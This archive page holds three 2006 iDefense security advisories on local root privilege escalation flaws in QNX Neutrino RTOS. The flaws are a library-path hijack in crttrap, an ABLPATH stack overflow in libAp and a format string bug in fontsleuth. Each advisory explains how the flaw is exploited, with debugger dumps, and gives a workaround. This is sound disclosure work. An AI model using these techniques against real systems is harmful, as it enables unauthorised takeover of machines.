There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. --- Safend is a leading provider of innovative endpoint security solutions that protect against corporate data leakage and penetration via physical and wireless ports. For more information, visit http://www.safend.com/.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS crttrap Arbitrary Library Loading Vulnerability
QNX Neutrino RTOS crttrap Arbitrary Library Loading Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=379 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of an arbitrary library loading vulnerability in QNX Neutrino RTOS's (QNX) crttrap command allows attackers to gain root privileges. The vulnerability specifically exists because crttrap trusts the LD_LIBRARY_PATH that a user supplies. A local attacker can create a malicious replacement for certain libraries and cause the replacement to be loaded in place of the original by manipulating the LD_LIBRARY_PATH environment variable. The crttrap binary is installed set user id root by default. III. ANALYSIS Successful exploitation provides local attackers with super-user privileges on the affected system, allowing for complete control. The system must be in text mode to exploit this vulnerability. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in QNX Neutrino RTOS version 6.2.1. Earlier versions are also suspected to be susceptible to exploitation. V. WORKAROUND Clear the set user ID or execute bits from the affected binary or remove it entirely. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1528 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/12/2005 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS libAp ABLPATH Buffer Overflow Vulnerability
QNX Neutrino RTOS libAp ABLPATH Buffer Overflow Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=381 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ II. DESCRIPTION Local exploitation of a stack-based buffer overflow vulnerability in QNX Inc.'s Neutrino RTOS Operating System allows local attackers to gain root privileges. The vulnerability specifically exists due to improper handling of environment variables in the libAP system library. The libAP system library is utilized by various setuid applications, including all applications that are PhAB-generated. The _ApFindTranslationFile() function fails to check bounds on the ABLPATH environment variable prior to a strcat operation. An attacker can supply an overly long value for ABLPATH to overflow the stack buffer and overwrite the return address as shown here: Program received signal SIGSEGV, Segmentation fault. 0xb8242bf7 in ApMultiStrcat () from /usr/qnx630/target/qnx6/x86/usr/lib/libAp.so.2 (gdb) x/i $pc 0xb8242bf7 : mov (%eax),%dl (gdb) bt #0 0xb8242bf7 in ApMultiStrcat () from /usr/qnx630/target/qnx6/x86/usr/lib/libAp.so.2 #1 0xb823ce07 in _ApFindTranslationFile () from /usr/qnx630/target/qnx6/x86/usr/lib/libAp.so.2 #2 0x42424242 in ?? () Attackers can supply a specially crafted value to overflow the buffer and execute arbitrary code. III. ANALYSIS Successful exploitation of the vulnerability allows local attackers to gain root privileges. The libAP library is a core system library on Neutrino RTOS, however it has had a number of trivial vulnerabilities similar to this one. A related vulnerability is the ABLANG environment variable overflow which results in a similarly exploitable scenario. IV. DETECTION iDefense has confirmed the existence of this vulnerability on QNX Neutrino RTOS 6.3.0. All versions are suspected vulnerable. V. WORKAROUND As a workaround solution, remove the setuid bit from any programs linked to libAP.so.2. An example is shown here: # ls -l /usr/photon/bin/phlocale -rwsrwxr-x 1 root root 54244 May 05 2004 /usr/photon/bin/phlocale # ldd /usr/photon/bin/phlocale /usr/photon/bin/phlocale: libAp.so.3 => /usr/lib/libAp.so.3 (0xb820) libph.so.3 => /usr/lib/libph.so.3 (0xb821) libphrender.so.2 => /usr/lib/libphrender.so.2 (0xb8312000) libm.so.2 => /lib/libm.so.2 (0xb8347000) libfont.so.1 => /lib/libfont.so.1 (0xb8363000) libc.so.2 => /usr/lib/ldqnx.so.2 (0xb030) # chmod -s /usr/photon/bin/phlocale VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/15/2005 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT iDefense credits Filipe Balestra ([EMAIL PROTECTED]) with the discovery of this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS fontsleuth Command Format String Vulnerability
QNX Neutrino RTOS fontsleuth Command Format String Vulnerability iDefense Security Advisory 02.07.06 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=380 February 7, 2006 I. BACKGROUND QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at: http://www.qnx.com/products/rtos/ fontsleuth is a setuid root binary included by default in version 6.3.0 QNX Neutrino RTOS (QNX). It is a utility that tells the Photon font manager where to look for fonts. II. DESCRIPTION Local exploitation of a format string vulnerability in QNX Neutrino RTOS's (QNX) fontsleuth command allows attackers to gain root privileges. The problem specifically exists in the handling of a string passed as the zeroth argument to the set user id (setuid) binary fontsleuth. The string is ultimately passed to a formatted print function where a format specifier is not supplied. This allows the attacker to use such dangerous format specifiers as %n and %hn to write to arbitrary areas in memory. Using this method, it is possible to overwrite the stored return address or several function pointers, allowing an attacker to seize CPU control and eventually execute arbitrary code under root privileges. The following debugger dump shows what successful exploitation of this vulnerability looks like at a low level. Loaded symbols for /usr/qnx630/target/qnx6/x86/lib/libc.so.2 #0 0xb033ec7e in _Putfld () from /usr/qnx630/target/qnx6/x86/lib/libc.so.2 (gdb) x/i $pc 0xb033ec7e <_Putfld+1082>: mov %ax,(%edx) (gdb) i r eax edx eax 0x4142 16706 edx 0x515253541364349780 Both EAX and EDX are controlled by the attacker, allowing an overwrite of any location in memory. Furthermore, multiple writes can be achieved by using more than one write format specifier. An attacker can choose to overwrite the saved return address or function pointer and easily gain control of execution. III. ANALYSIS Successful exploitation provides local attackers with super-user privileges on the affected system. This allows the attacker to have complete control. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in QNX Neutrino RTOS version 6.3.0. Earlier versions are suspected to be susceptible to exploitation as well. V. WORKAROUND Clear the set user ID or execute bits from the affected binary or remove it entirely. VI. VENDOR RESPONSE The vendor has not responded to communication regarding this issue. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 12/23/2004 Initial vendor notification 02/07/2006 Public disclosure IX. CREDIT iDefense Labs is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.